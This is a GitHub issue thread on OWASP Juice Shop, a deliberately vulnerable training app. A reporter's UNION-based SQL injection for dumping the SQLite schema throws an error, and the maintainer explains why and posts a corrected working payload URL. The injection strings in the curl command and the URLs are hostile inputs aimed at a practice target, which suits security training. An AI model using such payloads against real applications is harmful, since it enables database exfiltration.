### ISSUE TITLE
Error Exfiltrating DB Schema with SQLi in Docker  [🐛]

### ISSUE THREAD

**Issue by ObsidianPhoenix** [juice-shop/juice-shop#1243]
# :bug: Bug report

## Description

Using the latest docker image (`bkimminich/juice-shop@sha256:965e9ca6172ee85897219fe2ed26028251e34151cd472e32ac21c5ead2ddcaf9`), an error occurs using SQLi to exfiltrate the schema, that doesn't happen on an older image.

*NB:* I'm not sure how to get a docker image version, so I've used the `RepoDigest` field from `docker image inspect`. If you can point me to the right place, I'll update the issue with the correct versions.

### Is this a regression?

Yes. This does not happen in `bkimminich/juice-shop@sha256:db4a8526974915182a4485a42c2f36100c8725dcd217366d71161503cadf5c39`

## :microscope: Minimal Reproduction

- Pull the latest docker image
- Run the image using `docker run -d -e "NODE_ENV=ctf" -p 3000:3000 bkimminich/juice-shop:latest`
- Attempt to exfiltrate the schema using the below query 

    curl -X GET \
	    'http://localhost:3000/rest/products/search?q=ban%25%27%20%29%29%20UNION%20ALL%20Select%20name,%20%20null,%20sql,%20null,%20null,%20null,%20null,%20null,%20null%20from%20sqlite_master%20--' \
	    -H 'Accept: */*' \
	    -H 'Accept-Encoding: gzip, deflate' \
	    -H 'Cache-Control: no-cache' \
	    -H 'Connection: keep-alive' \
	    -H 'Host: localhost:3000' \
	    -H 'Postman-Token: d2bb571a-ad4b-4b0f-bd56-8acd7974b89e,885473c9-55ac-4eb2-af82-524fea606c5f' \
	    -H 'User-Agent: PostmanRuntime/7.18.0' \
	    -H 'X-Content-Type: application/json' \
	    -H 'cache-control: no-cache'

- Note the error

## :fire: Exception or Error

    <div id="wrapper">
        <h1>OWASP Juice Shop (Express ^4.17.1)</h1>
        <h2><em>500</em> TypeError: Cannot read property &#39;locale&#39; of null</h2>
        <ul id="stacktrace">
            <li> &nbsp; &nbsp;at IncomingMessage.i18nTranslate (/juice-shop/node_modules/i18n/i18n.js:213:25)</li>
            <li> &nbsp; &nbsp;at /juice-shop/routes/search.js:47:34</li>
            <li> &nbsp; &nbsp;at tryCatcher (/juice-shop/node_modules/bluebird/js/release/util.js:16:23)</li>
            <li> &nbsp; &nbsp;at Promise._settlePromiseFromHandler
                (/juice-shop/node_modules/bluebird/js/release/promise.js:547:31)</li>
            <li> &nbsp; &nbsp;at Promise._settlePromise (/juice-shop/node_modules/bluebird/js/release/promise.js:604:18)
            </li>
            <li> &nbsp; &nbsp;at Promise._settlePromise0
                (/juice-shop/node_modules/bluebird/js/release/promise.js:649:10)</li>
            <li> &nbsp; &nbsp;at Promise._settlePromises
                (/juice-shop/node_modules/bluebird/js/release/promise.js:729:18)</li>
            <li> &nbsp; &nbsp;at _drainQueueStep (/juice-shop/node_modules/bluebird/js/release/async.js:93:12)</li>
            <li> &nbsp; &nbsp;at _drainQueue (/juice-shop/node_modules/bluebird/js/release/async.js:86:9)</li>
            <li> &nbsp; &nbsp;at Async._drainQueues (/juice-shop/node_modules/bluebird/js/release/async.js:102:5)</li>
            <li> &nbsp; &nbsp;at Immediate.Async.drainQueues [as _onImmediate]
                (/juice-shop/node_modules/bluebird/js/release/async.js:15:14)</li>
            <li> &nbsp; &nbsp;at processImmediate (internal/timers.js:439:21)</li>
        </ul>
    </div>

## :deciduous_tree: Your Environment

node: v12.0.0
npm: v12.0.0

(These are from the host PC, not the docker image)

**Comment by bkimminich** [comment]
Problem could be reproduced also on v9.1.3 Heroku (http://demo.owasp-juice.shop/rest/products/search?q=ban%25%27%20%29%29%20UNION%20ALL%20Select%20name,%20%20null,%20sql,%20null,%20null,%20null,%20null,%20null,%20null%20from%20sqlite_master%20--) and v9.2.0-SNAPSHOT running locally on Windows.

**Comment by bkimminich** [comment]
Okay, this one is kind of mean, but it's actually not a bug I'd like to fix, because it is just a side effect of the way you made your payload. Let me explain:

Your payload tries to get the `name` into the first column and the `sql` into the third column of the result set and sets all else to null. The columns returned by the original query are `id`, `name`, `description`, ... and the last two are passed into a translation function _which does not survive `null` inputs. This is fine, because both values are not supposed to be null in the database for any product.

As the `sql` column sometimes is `null` itself, you are basically "double-killing" the translation by passing those into the `description` **and** with your static `null` passed into the second column `name`. If you change your payload so that `name` and `description` are static strings or numbers, and you exfiltrate the data into any of the other columns, then all will work fine:

http://localhost:3000/rest/products/search?q=ban%25%27%20%29%29%20UNION%20ALL%20Select%20name,%20'no nulls in these',%20'two columns please',%20sql,%20null,%20null,%20null,%20null,%20null%20from%20sqlite_master%20--
